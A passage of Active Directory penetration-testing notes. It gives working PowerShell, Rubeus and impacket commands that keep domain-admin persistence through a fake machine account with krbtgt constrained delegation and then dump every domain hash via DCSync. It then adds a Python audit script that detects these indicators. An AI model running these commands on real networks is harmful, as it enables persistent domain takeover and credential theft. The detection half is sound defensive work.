Now you can add yourself (the "snovvcrash" user) to the Domain Admins group at any time and act from there. Re-adding the user to Domain Admins each time is not actually necessary: once the backdoor user has been added to a protected group for the first time, its AdminCount attribute stays set to 1 anyway.
When DA is owned (or any other account with the DS-Install-Replica permission), you can create a fake machine account (or use an existing real machine account), set the SERVER_TRUST_ACCOUNT bit for it and perform DCSync on behalf of this account to regain domain dominance.
```powershell
# create a new service account (or abuse an existing one)
PM > New-MachineAccount -Domain megacorp.local -DomainController DC01.megacorp.local -MachineAccount FakeMachine -Password $(ConvertTo-SecureString 'Passw0rd1!' -AsPlainText -Force) -Verbose

# set UAC to be 'WORKSTATION_TRUST_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION' (0x1000 | 0x1000000 = 16781312)
PV3 > Set-DomainObject "CN=FakeMachine,CN=Computers,DC=megacorp,DC=local" -Set @{useraccountcontrol=16781312} -Verbose

# set the krbtgt SPN for delegation
PV3 > Set-DomainObject "CN=FakeMachine,CN=Computers,DC=megacorp,DC=local" -Set @{"msDS-AllowedToDelegateTo"=@("krbtgt/MEGACORP")} -Verbose

# request TGS via S4U (will act as a TGT of the impersonated user)
PS > .\Rubeus.exe s4u /domain:megacorp.net /user:FakeMachine$ /rc4:b2bdbe60565b677dfb133866722317fd /impersonateuser:snovvcrash /msdsspn:krbtgt/MEGACORP /ptt

# cleanup: remove the SPN for delegation
PV3 > Set-DomainObject "CN=FakeMachine,CN=Computers,DC=megacorp,DC=local" -Clear msDS-AllowedToDelegateTo -Verbose

# cleanup: back to UAC 'WORKSTATION_TRUST_ACCOUNT' (0x1000 = 4096)
PV3 > Set-DomainObject "CN=FakeMachine,CN=Computers,DC=megacorp,DC=local" -Set @{useraccountcontrol=4096} -Verbose
```
```bash
# create a new service account (or abuse an existing one)
$ addcomputer.py -computer-name Persist1 -computer-pass 'Passw0rd1!' -dc-ip 192.168.1.11 megacorp.local/lowpriv:'Passw0rd2!'

# set UAC to be 'WORKSTATION_TRUST_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION' and set the krbtgt SPN for delegation
$ python3 setCD.py megacorp.local/administrator:'Passw0rd3!' -dc-ip 192.168.1.11 -target 'Persist1$' -spn krbtgt/MEGACORP

# request TGS via S4U (will act as a TGT of the impersonated user)
$ getST.py -spn krbtgt/MEGACORP megacorp.local/'Persist1$:Passw0rd1!' -dc-ip 192.168.1.11 -impersonate 'DC01$'

# fire DCSync
$ KRB5CCNAME=`pwd`/'DC01$.ccache' secretsdump.py DC01.megacorp.local -dc-ip 192.168.1.11 -k -no-pass -just-dc
```
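Every step above leaves a durable trace in the directory: a computer object with TRUSTED_TO_AUTH_FOR_DELEGATION set and msDS-AllowedToDelegateTo pointing at krbtgt/, a non-DC object carrying SERVER_TRUST_ACCOUNT, or a user whose adminCount is still 1 after it left every protected group. The script below is an added example (not code from the original notes or from Powermad, PowerView or impacket) that audits objects for exactly those indicators. It works on plain dicts shaped like LDAP attribute sets so it runs offline; the sample objects are constructed to mirror the names used on this page, and the `dc_ou` parameter assumes the default "Domain Controllers" OU.

```python
# Added example: offline audit for the persistence indicators described above.
# Objects are dicts keyed by LDAP attribute name; in practice feed it the
# entries returned by an ldap3 search over the domain.

# userAccountControl bit flags (values as documented in MS-ADTS / MS-SAMR)
UAC_FLAGS = {
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}

# default groups whose members receive adminCount=1 through AdminSDHolder
PROTECTED_GROUPS = {
    "account operators", "administrators", "backup operators", "domain admins",
    "domain controllers", "enterprise admins", "print operators",
    "read-only domain controllers", "replicator", "schema admins",
    "server operators",
}

def decode_uac(value):
    """Return the set of flag names set in a userAccountControl integer."""
    return {name for bit, name in UAC_FLAGS.items() if value & bit}

def rdn_value(dn):
    """First RDN value of a DN, e.g. 'Domain Admins' from 'CN=Domain Admins,...'."""
    return dn.split(",")[0].split("=", 1)[1]

def audit_object(obj, dc_ou="ou=domain controllers"):
    """Return a list of finding strings for one directory object (dict)."""
    findings = []
    dn = obj["distinguishedName"]
    in_dc_ou = dc_ou in dn.lower()
    uac = decode_uac(obj.get("userAccountControl", 0))

    # 1) constrained delegation to the krbtgt service: an S4U ticket for that
    #    SPN is usable as a TGT for the impersonated principal
    krbtgt_spns = [s for s in obj.get("msDS-AllowedToDelegateTo", [])
                   if s.lower().startswith("krbtgt/")]
    if krbtgt_spns:
        findings.append(f"{dn}: delegation to {krbtgt_spns}")

    # 2) protocol transition (TRUSTED_TO_AUTH_FOR_DELEGATION) on an object
    #    that is not a DC; the steps above set exactly this bit
    if "TRUSTED_TO_AUTH_FOR_DELEGATION" in uac and not in_dc_ou:
        findings.append(f"{dn}: TRUSTED_TO_AUTH_FOR_DELEGATION outside {dc_ou}")

    # 3) SERVER_TRUST_ACCOUNT outside the Domain Controllers OU: the object is
    #    treated as a DC, which is what makes replication (DCSync) possible
    if "SERVER_TRUST_ACCOUNT" in uac and not in_dc_ou:
        findings.append(f"{dn}: SERVER_TRUST_ACCOUNT outside {dc_ou}")

    # 4) adminCount=1 left behind after leaving every protected group
    groups = {rdn_value(g).lower() for g in obj.get("memberOf", [])}
    if obj.get("adminCount", 0) == 1 and not (groups & PROTECTED_GROUPS):
        findings.append(f"{dn}: adminCount=1 but not in any protected group")
    return findings

def audit_directory(objects):
    """Run audit_object over every object and return all findings."""
    return [f for obj in objects for f in audit_object(obj)]

# constructed sample objects mirroring the names used on this page
SAMPLE_OBJECTS = [
    {"distinguishedName": "CN=FakeMachine,CN=Computers,DC=megacorp,DC=local",
     "userAccountControl": 16781312,   # WORKSTATION_TRUST | TRUSTED_TO_AUTH
     "msDS-AllowedToDelegateTo": ["krbtgt/MEGACORP"]},
    {"distinguishedName": "CN=DC01,OU=Domain Controllers,DC=megacorp,DC=local",
     "userAccountControl": 0x82000},   # SERVER_TRUST | TRUSTED_FOR_DELEGATION: a real DC
    {"distinguishedName": "CN=WS01,CN=Computers,DC=megacorp,DC=local",
     "userAccountControl": 4096},      # plain workstation
    {"distinguishedName": "CN=Persist1,CN=Computers,DC=megacorp,DC=local",
     "userAccountControl": 0x3000},    # WORKSTATION_TRUST | SERVER_TRUST, not a DC
    {"distinguishedName": "CN=snovvcrash,CN=Users,DC=megacorp,DC=local",
     "adminCount": 1,
     "memberOf": ["CN=IT Staff,OU=Groups,DC=megacorp,DC=local"]},
    {"distinguishedName": "CN=Administrator,CN=Users,DC=megacorp,DC=local",
     "adminCount": 1,
     "memberOf": ["CN=Domain Admins,CN=Users,DC=megacorp,DC=local"]},
]

if __name__ == "__main__":
    for line in audit_directory(SAMPLE_OBJECTS):
        print(line)
```

Run against the sample set it reports four findings: two for FakeMachine (the krbtgt SPN and the protocol-transition bit), one for Persist1 (SERVER_TRUST_ACCOUNT outside the DC OU) and one for the snovvcrash user (stale adminCount), while DC01, WS01 and the built-in Administrator pass clean. The check on the DC OU is deliberately coarse: an object that was moved into that OU would slip past it, so pairing this audit with the 4742 (computer account changed) and 5136 (directory object modified) events on the DCs is the sensible complement.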